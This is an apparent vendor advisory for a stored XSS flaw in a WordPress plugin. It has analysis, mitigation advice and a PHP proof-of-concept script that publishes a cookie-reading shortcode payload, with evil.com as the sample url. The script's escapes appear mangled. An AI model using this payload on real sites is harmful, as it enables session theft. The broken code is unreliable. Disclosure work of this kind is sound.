What is CVE-2026-4081?

CVE-2026-4081 is a Stored Cross-Site Scripting (XSS) vulnerability affecting the ZeM STL plugin for WordPress, versions 1.0 and earlier. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the [zemstl] shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping on shortcode attributes like ‘url’, ‘color’, and ‘bgcolor’. Attackers can inject scripts that execute when other users access the affected pages, as the attributes are interpolated directly into HTML without proper escaping.

Who is affected by this vulnerability?

Any WordPress site using the ZeM STL plugin version 1.0 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to inject malicious scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the ZeM STL plugin installed. If it is version 1.0 or earlier, your site is at risk. Additionally, review any posts or pages that utilize the [zemstl] shortcode for potential exploitation.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-4081 is 6.4, indicating a medium severity level. This score suggests that while the vulnerability can be exploited, it requires specific conditions, such as authenticated access, making it less critical than high-severity vulnerabilities.

How can I mitigate this vulnerability?

The most effective mitigation is to disable or remove the ZeM STL plugin immediately, as no patched version is currently available. If you must use the plugin, ensure that you implement proper output escaping for all shortcode attributes.

What does proper output escaping involve?

Proper output escaping involves using functions like esc_attr() to sanitize user input before rendering it in HTML. For attributes used in inline event handlers or URLs, additional escaping with wp_kses() or esc_url() is recommended.

What are the potential impacts of this vulnerability?

Exploitation of this vulnerability can lead to full stored XSS attacks, allowing attackers to inject scripts that steal cookies, redirect users, or perform actions on behalf of victims. This can have severe implications for site security and user trust.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated attacker can log in, create or edit a post, and insert a malicious [zemstl] shortcode with harmful attributes. This demonstrates the ease of exploitation and the potential for widespread impact on site visitors.

What should I do if I suspect my site has been exploited?

If you suspect your site has been exploited, immediately disable the ZeM STL plugin and conduct a thorough security audit. Check for unauthorized changes, review user accounts, and consider restoring from a clean backup if necessary.

Is there a timeline for a patch or update?

As of now, there is no official patch for CVE-2026-4081. It is advisable to monitor the plugin’s official repository or security advisories for updates regarding a fix.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 2, 2026

CVE-2026-4081: ZeM STL <= 1.0 Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes PoC, Patch Analysis & Rule

CVE ID CVE-2026-4081

Plugin zem-stl-viewer

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.0

Patched Version —

Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4081 (metadata-based): This vulnerability is a Stored Cross-Site Scripting (XSS) in the ZeM STL WordPress plugin, version 1.0 and earlier. It affects the [zemstl] shortcode and allows authenticated users with Contributor-level access or higher to inject arbitrary web scripts. The CVSS score is 6.4 (Medium severity), with a network attack vector, low complexity, and no user interaction required for the initial injection.

The root cause is insufficient input sanitization and output escaping on the shortcode attributes ‘url’, ‘color’, and ‘bgcolor’. The plugin directly interpolates these attribute values into HTML attributes without using esc_attr() or any escaping function. This is a classic CWE-79 (Stored XSS) pattern. Atomic Edge research infers that the shortcode handler likely concatenates attribute values directly into an HTML string or inline style attribute. For example, a value like ‘red” onclick=”alert(1)’ in the ‘color’ attribute would break out of the HTML attribute context. This inference is based on the vulnerability description and CWE classification, as no source code is available for confirmation.

Exploitation requires an authenticated user with Contributor role or higher. The attacker creates or edits a WordPress post or page and inserts the [zemstl] shortcode with malicious attributes. The payload is injected into one of the three vulnerable parameters: ‘url’ (likely an href attribute or script src), ‘color’ (likely an inline style or font color attribute), or ‘bgcolor’ (likely a background color attribute). A sample payload would be: [zemstl url=’http://evil.com’ color=’red” onmouseover=”alert(1)’]. The shortcode renders on the page, and the attribute value breaks out of the HTML context. When any user (including administrators) visits the page, the injected script executes in their browser context. The attack uses a standard WordPress post/page editor, requiring no special endpoints beyond /wp-admin/post-new.php or /wp-admin/post.php for editing.

Remediation requires proper output escaping for shortcode attributes. The plugin must use esc_attr() on all shortcode attribute values before outputting them in HTML attribute context. For values used in inline event handlers or URLs, additional escaping with wp_kses() or esc_url() is needed. Since no patched version exists, the only current remediation is to remove or disable the plugin. Atomic Edge recommends disabling the plugin immediately.

The impact includes full stored XSS capability against all site visitors. An attacker can inject JavaScript that steals cookies, performs actions on behalf of the victim (e.g., creating admin accounts), defaces pages, or redirects users to malicious sites. Since the vulnerability requires no user interaction beyond visiting the page, it can be used for large-scale attacks against site users. The CVSS scope change (S:C) indicates the vulnerable component impacts resources beyond its security context, meaning the injected script can access other pages or sensitive data.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4081 - ZeM STL <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

// Configuration
$target_url = 'http://example.com';  // Change to target WordPress site URL
$username = 'contributor';           // Valid WordPress account with Contributor role
$password = 'password';              // Password for the account

// Step 1: Login to get cookies and nonces
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);

if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}
echo "[+] Login successfuln";

// Step 2: Extract _wpnonce for creating a new post
$admin_url = $target_url . '/wp-admin/';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract the REST API nonce or admin nonce from the page
preg_match('/wp_rest(s*nonces*:s*"([^"]+)"/i', $response, $matches);
$rest_nonce = isset($matches[1]) ? $matches[1] : '';

if (empty($rest_nonce)) {
    // Fallback: try to extract from inline script
    preg_match('/wpApiSettings.*nonce"s*:s*"([^"]+)"/i', $response, $matches2);
    $rest_nonce = isset($matches2[1]) ? $matches2[1] : '';
}

echo "[+] REST nonce: " . ($rest_nonce ? $rest_nonce : 'Not found, trying AJAX method') . "n";

// Step 3: Create a new post with the malicious shortcode
// Use the WordPress REST API to create a post
if (!empty($rest_nonce)) {
    $post_data = array(
        'title' => 'Atomic Edge PoC - CVE-2026-4081',
        'content' => '[zemstl url="http://evil.com" color="red" onfocus="alert(document.cookie)" autofocus="true" bgcolor="blue"]This is a test[/zemstl]',
        'status' => 'publish'
    );
    
    $rest_url = $target_url . '/wp-json/wp/v2/posts';
    $headers = array(
        'Content-Type: application/json',
        'X-WP-Nonce: ' . $rest_nonce
    );
    
    curl_setopt($ch, CURLOPT_URL, $rest_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    if ($http_code == 201) {
        $result = json_decode($response, true);
        echo "[+] Post created successfully! ID: " . $result['id'] . "n";
        echo "[+] Visit: " . $result['link'] . "n";
    } else {
        echo "[-] Failed to create post via REST API. HTTP code: $http_coden";
        echo "[-] Response: " . substr($response, 0, 500) . "n";
    }
} else {
    // Fallback: Use admin-ajax.php method or direct admin post creation
    echo "[!] REST API nonce not found. Attempting admin-post.php method...n";
    
    // Get the admin nonce for post creation
    $post_new_url = $target_url . '/wp-admin/post-new.php?post_type=post';
    curl_setopt($ch, CURLOPT_URL, $post_new_url);
    curl_setopt($ch, CURLOPT_POST, 0);
    $response = curl_exec($ch);
    
    preg_match('/<input[^>]+id="_wpnonce"[^>]+value="([^"]+)"/', $response, $nonce_matches);
    $admin_nonce = isset($nonce_matches[1]) ? $nonce_matches[1] : '';
    
    if (empty($admin_nonce)) {
        die('Failed to extract admin nonce.');
    }
    
    // Submit the post via admin-post or direct POST
    $post_data = array(
        '_wpnonce' => $admin_nonce,
        'action' => 'post',
        'post_type' => 'post',
        'post_title' => 'Atomic Edge PoC - CVE-2026-4081',
        'content' => '[zemstl url="http://evil.com" color="red" onfocus="alert(document.cookie)" autofocus="true" bgcolor="blue"]This is a test[/zemstl]',
        'post_status' => 'publish'
    );
    
    curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    // Check if redirect happened (success)
    $effective_url = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
    if (strpos($effective_url, 'post=') !== false) {
        echo "[+] Post created! Effective URL: $effective_urln";
        echo "[+] The XSS payload is now live on the site.n";
    } else {
        echo "[-] Failed to create post. HTTP code: $http_coden";
        echo "[-] Response: " . substr($response, 0, 500) . "n";
    }
}

curl_close($ch);
echo "n[+] Proof of Concept complete. Remove the created post after verification.n";

Frequently Asked Questions

What is CVE-2026-4081?
Understanding the vulnerability
CVE-2026-4081 is a Stored Cross-Site Scripting (XSS) vulnerability affecting the ZeM STL plugin for WordPress, versions 1.0 and earlier. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the [zemstl] shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping on shortcode attributes like ‘url’, ‘color’, and ‘bgcolor’. Attackers can inject scripts that execute when other users access the affected pages, as the attributes are interpolated directly into HTML without proper escaping.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the ZeM STL plugin version 1.0 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to inject malicious scripts.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the ZeM STL plugin installed. If it is version 1.0 or earlier, your site is at risk. Additionally, review any posts or pages that utilize the [zemstl] shortcode for potential exploitation.
What is the CVSS score and what does it mean?
Understanding risk levels
The CVSS score for CVE-2026-4081 is 6.4, indicating a medium severity level. This score suggests that while the vulnerability can be exploited, it requires specific conditions, such as authenticated access, making it less critical than high-severity vulnerabilities.
How can I mitigate this vulnerability?
Recommended actions
The most effective mitigation is to disable or remove the ZeM STL plugin immediately, as no patched version is currently available. If you must use the plugin, ensure that you implement proper output escaping for all shortcode attributes.
What does proper output escaping involve?
Best practices for security
Proper output escaping involves using functions like esc_attr() to sanitize user input before rendering it in HTML. For attributes used in inline event handlers or URLs, additional escaping with wp_kses() or esc_url() is recommended.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability can lead to full stored XSS attacks, allowing attackers to inject scripts that steal cookies, redirect users, or perform actions on behalf of victims. This can have severe implications for site security and user trust.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploit
The proof of concept illustrates how an authenticated attacker can log in, create or edit a post, and insert a malicious [zemstl] shortcode with harmful attributes. This demonstrates the ease of exploitation and the potential for widespread impact on site visitors.
What should I do if I suspect my site has been exploited?
Response to potential incidents
If you suspect your site has been exploited, immediately disable the ZeM STL plugin and conduct a thorough security audit. Check for unauthorized changes, review user accounts, and consider restoring from a clean backup if necessary.
Is there a timeline for a patch or update?
Future updates
As of now, there is no official patch for CVE-2026-4081. It is advisable to monitor the plugin’s official repository or security advisories for updates regarding a fix.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations